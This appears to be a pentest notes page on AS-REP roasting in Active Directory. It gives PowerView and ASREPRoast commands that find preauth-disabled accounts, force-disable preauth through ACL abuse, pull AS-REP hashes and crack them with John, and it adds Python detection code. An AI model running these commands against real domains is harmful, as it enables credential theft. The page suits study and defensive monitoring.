# Targeted Kerberoasting - AS-REPs

* If a user's UserAccountControl settings have "Do not require Kerberos preauthentication" enabled (i.e. Kerberos preauth is disabled), it is possible to grab that user's crackable AS-REP and brute-force it offline.
* With sufficient rights over the user (GenericWrite or GenericAll), Kerberos preauth can be force-disabled as well.
* **Kerberos preauthentication is enabled by default, so accounts with it disabled are rare.**
* **Requirements:**
  * **Enough permission over the user, or over a group that holds rights on the user, so that we can set DoesNotRequirePreAuth for the user, or**
  * **Kerberos preauth already disabled on the user.**

```powershell
# Enumerating accounts with Kerberos preauth disabled
# Using PowerView_dev:
import-module powerview_dev.ps1
Get-DomainUser -PreauthNotRequired -Verbose


# Force-disable Kerberos preauth:
import-module powerview_dev.ps1
# Look for objects that our current group (here RDPUsers) holds modify rights on.
# Any user found this way can have DoesNotRequirePreAuth set so that its
# AS-REP can be requested and cracked offline:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
# Set DoesNotRequirePreAuth on a user: 4194304 (0x400000) is the
# DONT_REQ_PREAUTH bit of userAccountControl; -XOR toggles the bit, so run it once
Set-DomainObject -Identity <usernametodisablehere> -XOR @{useraccountcontrol=4194304} -Verbose
# Confirm the account now shows up as preauth-not-required
Get-DomainUser -PreauthNotRequired -Verbose


# Using the ActiveDirectory module:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth


# -------------------- Abuse it --------------------
# Import the ASREPRoast module
import-module ASREPRoast-master\ASREPRoast.ps1


# Request the encrypted AS-REP of one user for offline brute-force
Get-ASREPHash -UserName VPN1user -Verbose


# Enumerate all users with Kerberos preauth disabled and request a hash for each
Invoke-ASREPRoast -Verbose
```

Using the bleeding-jumbo branch of John the Ripper, the hashes can be brute-forced offline:

```bash
./john vpn1user.txt --wordlist=wordlist.txt
```
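The two conditions in the Requirements list and the `-XOR @{useraccountcontrol=4194304}` trick above both come down to one bit of `userAccountControl`. The following Python is an added example, not code from the original page or from PowerView: it decodes that attribute, mirrors what the XOR does to it, reproduces the `Get-DomainUser -PreauthNotRequired` check over a directory snapshot, and flags account changes where the bit went from clear to set (the old/new UAC pair is what Windows event 4738 records). The flag bit values are the documented Active Directory constants; the account records and change records are constructed sample data.

```python
from __future__ import annotations

# Documented userAccountControl flag bits (subset).
UAC_FLAGS = {
    "SCRIPT": 0x0001,
    "ACCOUNTDISABLE": 0x0002,
    "PASSWD_NOTREQD": 0x0020,
    "NORMAL_ACCOUNT": 0x0200,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,
    "DONT_REQ_PREAUTH": 0x400000,  # 4194304, the value passed to -XOR on this page
}
DONT_REQ_PREAUTH = UAC_FLAGS["DONT_REQ_PREAUTH"]


def decode_uac(value: int) -> list[str]:
    """Return the names of the flags set in a userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def preauth_not_required(value: int) -> bool:
    """True when the KDC will answer an AS-REQ for this account without preauth."""
    return bool(value & DONT_REQ_PREAUTH)


def toggle_preauth_bit(value: int) -> int:
    """What `Set-DomainObject -XOR @{useraccountcontrol=4194304}` does to the
    attribute: XOR flips the bit, so applying it twice restores the original."""
    return value ^ DONT_REQ_PREAUTH


def find_roastable(accounts: list[dict]) -> list[str]:
    """Equivalent of `Get-DomainUser -PreauthNotRequired` over an LDAP-style list."""
    return [a["sAMAccountName"] for a in accounts
            if preauth_not_required(a["userAccountControl"])]


def preauth_disabled_changes(changes: list[dict]) -> list[str]:
    """Flag account changes where DONT_REQ_PREAUTH went from clear to set.
    Each record carries the old and new UAC value as event 4738 reports them."""
    return [c["target"] for c in changes
            if not preauth_not_required(c["old_uac"])
            and preauth_not_required(c["new_uac"])]


# Constructed sample directory snapshot (not real accounts).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "alice", "userAccountControl": 0x200},                 # normal account
    {"sAMAccountName": "vpn1user", "userAccountControl": 0x200 | 0x400000},   # preauth disabled
    {"sAMAccountName": "svc-backup", "userAccountControl": 0x200 | 0x10000},  # password never expires
]

# Constructed sample of account-change records (old/new UAC pairs).
SAMPLE_CHANGES = [
    {"target": "svc-backup", "old_uac": 0x10200, "new_uac": 0x410200},  # bit turned on
    {"target": "alice", "old_uac": 0x200, "new_uac": 0x200},            # no change
    {"target": "vpn1user", "old_uac": 0x400200, "new_uac": 0x200},      # bit turned off (remediation)
]

if __name__ == "__main__":
    print("preauth not required:", find_roastable(SAMPLE_ACCOUNTS))
    print("preauth newly disabled:", preauth_disabled_changes(SAMPLE_CHANGES))
    print("flags in 0x410200:", decode_uac(0x410200))
```

Because the page's command uses XOR rather than setting the bit, running it twice on the same account silently re-enables preauth; `toggle_preauth_bit` shows that round trip. On the monitoring side, alerting on the old-to-new transition rather than on the absolute value keeps the check quiet for accounts that were already in that state.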


![](/files/-MTY7Njyx2L0-xPGm-Hn)

**Get-DomainUser -PreauthNotRequired -Verbose**

**Any user listed with DoesNotRequirePreAuth set can be used for this attack.**

![](/files/-MTY3ND0R9ttI1dzSxtV)

**Invoke-ACLScanner -ResolveGUIDs | ?{$\_.IdentityReferenceName -match "RDPUsers"}**

![](/files/-MTY5uVM7CjWSXTlnhg_)

